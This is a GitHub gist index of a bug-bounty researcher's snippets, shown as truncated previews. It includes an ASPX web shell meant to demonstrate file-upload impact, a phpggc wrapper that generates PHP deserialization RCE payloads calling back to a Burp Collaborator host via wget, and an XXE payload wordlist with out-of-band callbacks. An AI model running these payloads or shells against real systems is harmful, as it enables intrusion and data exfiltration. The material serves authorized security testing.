Skip to content

Instantly share code, notes, and snippets.

@honoki
honoki / harmless-shell.aspx
Last active Jul 20, 2021
A harmless ASPX shell to demonstrate the impact of arbitrary file upload.
View harmless-shell.aspx
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<!-- sources: https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx -->
<%
Response.Write("Executing code.")
@honoki
honoki / hackerone-update-program-scopes.sh
Last active Aug 12, 2021
Update the scope of your HackerOne programs
View hackerone-update-program-scopes.sh
#!/bin/bash
# Update the scope of your HackerOne programs
h1name="<your-hackerone-username>"
apitoken="<your-hackerone-api-token>"
next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100'
for p in $(bbrf programs where platform is hackerone --show-empty-scope); do
h1id=$(bbrf show $p | jq -r .tags.h1id)
@honoki
honoki / hackerone-initiate-programs.sh
Last active Sep 25, 2021
Create new BBRF programs from your private and public HackerOne programs.
View hackerone-initiate-programs.sh
#!/bin/bash
# Initiate new BBRF programs from your public and private HackerOne programs
h1name="<your-hackerone-username>"
apitoken="<your-hackerone-api-token>"
next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100'
while [ "$next" ]; do
@honoki
honoki / phpggc-generate-payloads.sh
Last active Oct 12, 2021
Automatically generate properly formatted RCE payloads for every gadget chain in phpggc.
View phpggc-generate-payloads.sh
#!/bin/bash
# phpggc wrapper that automatically generates payloads for RCE gadgets
function="system"
command="wget http://your.burpcollaborator.net/?"
# modify the options below depending on your use case
options="-a -b -u -f"
# generate gadget chains
@honoki
honoki / xxe-payloads.txt
Last active Sep 25, 2021
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
View xxe-payloads.txt
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@honoki
honoki / mitmdump-logger.py
Created Jul 14, 2020
mitmdump script to dump incoming HTTP requests to Slack
View mitmdump-logger.py
#!/usr/bin/python3
import requests
def is_blacklisted(domain):
blacklist = open("/path/to/blacklist.txt")
return domain in [w.strip() for w in blacklist.readlines()]
def request(flow):
req = flow.request.method + ' ' + flow.request.path + ' ' + flow.request.http_version + '\n'
@honoki
honoki / dnsmonitor.py
Last active Jul 17, 2021
Monitor bind9 logs and push queries to Slack
View dnsmonitor.py
import time
import requests
def is_blacklisted(domain):
blacklist = open("blacklist.txt")
return domain in [w.strip() for w in blacklist.readlines()]
# Avoid Slack expanding your links by replacing the last dot.
def escape_domain(domain):
return domain.replace('yourdomain.com', 'yourdomain[.]com')